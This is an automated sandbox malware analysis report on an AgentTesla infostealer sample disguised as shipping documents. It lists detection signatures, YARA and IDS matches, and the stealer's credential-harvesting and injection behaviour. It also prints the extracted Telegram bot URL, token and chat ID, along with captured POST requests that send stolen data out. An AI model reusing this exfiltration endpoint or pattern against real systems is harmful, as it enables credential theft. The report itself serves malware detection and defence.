Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BL-SHIPPING DOCUMENTS.exe

Overview

General Information

Sample Name:BL-SHIPPING DOCUMENTS.exe
Analysis ID:756203
MD5:69fe54a9cafee09f25e0d3f7a51488c7
SHA1:747373a2640c7fca04258681c7ec313be3b0db24
SHA256:dc72c7525da8aa1afaadaf707499054dd9be20d0c78318d2f63af1fa37d58546
Tags:agentteslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
.NET source code references suspicious native API functions
Sample is not signed and drops a device driver
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Executable has a suspicious name (potential lure to open the executable)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Enables driver privileges
Drops PE files
Creates driver files
Spawns drivers
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates or modifies windows services
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • BL-SHIPPING DOCUMENTS.exe (PID: 6116 cmdline: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe MD5: 69FE54A9CAFEE09F25E0D3F7A51488C7)
    • CasPol.exe (PID: 5312 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
  • cleanup
{"C2 url": "https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendMessage?chat_id=1504449137"}
SourceRuleDescriptionAuthorStrings
00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
      • 0x31be8:$a13: get_DnsResolver
      • 0x30301:$a20: get_LastAccessed
      • 0x325f5:$a27: set_InternalServerPort
      • 0x3292a:$a30: set_GuidMasterKey
      • 0x30413:$a33: get_Clipboard
      • 0x30421:$a34: get_Keyboard
      • 0x317bf:$a35: get_ShiftKeyDown
      • 0x317d0:$a36: get_AltKeyDown
      • 0x3042e:$a37: get_Password
      • 0x30f1a:$a38: get_PasswordHash
      • 0x32029:$a39: get_DefaultCredentials
      00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          Click to see the 5 entries
          SourceRuleDescriptionAuthorStrings
          1.0.CasPol.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            1.0.CasPol.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              1.0.CasPol.exe.400000.0.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
              • 0x348d8:$s10: logins
              • 0x34358:$s11: credential
              • 0x30613:$g1: get_Clipboard
              • 0x30621:$g2: get_Keyboard
              • 0x3062e:$g3: get_Password
              • 0x319af:$g4: get_CtrlKeyDown
              • 0x319bf:$g5: get_ShiftKeyDown
              • 0x319d0:$g6: get_AltKeyDown
              1.0.CasPol.exe.400000.0.unpackWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
              • 0x31de8:$a13: get_DnsResolver
              • 0x30501:$a20: get_LastAccessed
              • 0x327f5:$a27: set_InternalServerPort
              • 0x32b2a:$a30: set_GuidMasterKey
              • 0x30613:$a33: get_Clipboard
              • 0x30621:$a34: get_Keyboard
              • 0x319bf:$a35: get_ShiftKeyDown
              • 0x319d0:$a36: get_AltKeyDown
              • 0x3062e:$a37: get_Password
              • 0x3111a:$a38: get_PasswordHash
              • 0x32229:$a39: get_DefaultCredentials
              No Sigma rule has matched
              Timestamp:192.168.2.5149.154.167.220497054432851779 11/29/22-20:01:10.306536
              SID:2851779
              Source Port:49705
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: BL-SHIPPING DOCUMENTS.exeReversingLabs: Detection: 22%
              Source: BL-SHIPPING DOCUMENTS.exeVirustotal: Detection: 26%Perma Link
              Source: BL-SHIPPING DOCUMENTS.exeJoe Sandbox ML: detected
              Source: 1.0.CasPol.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
              Source: 1.0.CasPol.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendMessage?chat_id=1504449137"}
              Source: CasPol.exe.5312.1.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendMessage"}
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: BL-SHIPPING DOCUMENTS.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\Azez\Downloads\JesusIsTheLord\obj\Debug\Tora.pdb source: BL-SHIPPING DOCUMENTS.exe
              Source: Binary string: C:\agent\1\s\sys\x64\Release\ProcExpDriver.pdb source: ?????.sys.0.dr

              Networking

              barindex
              Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49705 -> 149.154.167.220:443
              Source: unknownDNS query: name: api.telegram.org
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: global trafficHTTP traffic detected: POST /bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad24475608ceeHost: api.telegram.orgContent-Length: 1001Expect: 100-continueConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
              Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
              Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://TcwLAp.com
              Source: CasPol.exe, 00000001.00000002.824168793.00000000034D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
              Source: CasPol.exe, 00000001.00000002.829202853.000000000634E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: CasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.824168793.00000000034D8000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.823692783.0000000003476000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://FZsMKmQQms.net
              Source: CasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/
              Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/1504449137%discordapi%yyy
              Source: CasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendDocument
              Source: CasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
              Source: ?????.sys.0.drString found in binary or memory: https://www.sysinternals.com0
              Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
              Source: unknownHTTP traffic detected: POST /bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad24475608ceeHost: api.telegram.orgContent-Length: 1001Expect: 100-continueConnection: Keep-Alive
              Source: unknownDNS traffic detected: queries for: api.telegram.org
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2

              System Summary

              barindex
              Source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
              Source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: Process Memory Space: CasPol.exe PID: 5312, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: initial sampleStatic PE information: Filename: BL-SHIPPING DOCUMENTS.exe
              Source: BL-SHIPPING DOCUMENTS.exe, u0036WPvYiAf4rXCUiIeqR/yw3NM9q.csLarge array initialization: get_hii: array initializer size 481808
              Source: 1.0.CasPol.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b7B11A2CAu002d4195u002d4BA6u002d80B6u002d4DED58549CE3u007d/AB3968EDu002d5083u002d4DC4u002d8042u002dAEEF6AA978C6.csLarge array initialization: .cctor: array initializer size 10967
              Source: BL-SHIPPING DOCUMENTS.exeStatic file information: Suspicious name
              Source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
              Source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: Process Memory Space: CasPol.exe PID: 5312, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DF9281_2_013DF928
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_062276F01_2_062276F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0622CF701_2_0622CF70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0622A4C01_2_0622A4C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06225BC01_2_06225BC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0622768E1_2_0622768E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06225A701_2_06225A70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0622F2E01_2_0622F2E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_062233301_2_06223330
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0623BE8D1_2_0623BE8D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_062393301_2_06239330
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0623AF881_2_0623AF88
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_062355A01_2_062355A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06237F801_2_06237F80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_062351481_2_06235148
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_062600401_2_06260040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06266BA81_2_06266BA8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_062649401_2_06264940
              Source: BL-SHIPPING DOCUMENTS.exeStatic PE information: No import functions for PE file found
              Source: BL-SHIPPING DOCUMENTS.exe, 00000000.00000000.294039258.00000249F70DA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameTora.exe4 vs BL-SHIPPING DOCUMENTS.exe
              Source: BL-SHIPPING DOCUMENTS.exeBinary or memory string: OriginalFilenameTora.exe4 vs BL-SHIPPING DOCUMENTS.exe
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeProcess token adjusted: Load DriverJump to behavior
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeFile created: C:\Users\user\AppData\Local\Temp\?????.sysJump to behavior
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeDriver loaded: \Registry\Machine\System\CurrentControlSet\Services\TaskKillJump to behavior
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\?????.sys 440883CD9D6A76DB5E53517D0EC7FE13D5A50D2F6A7F91ECFC863BC3490E4F5C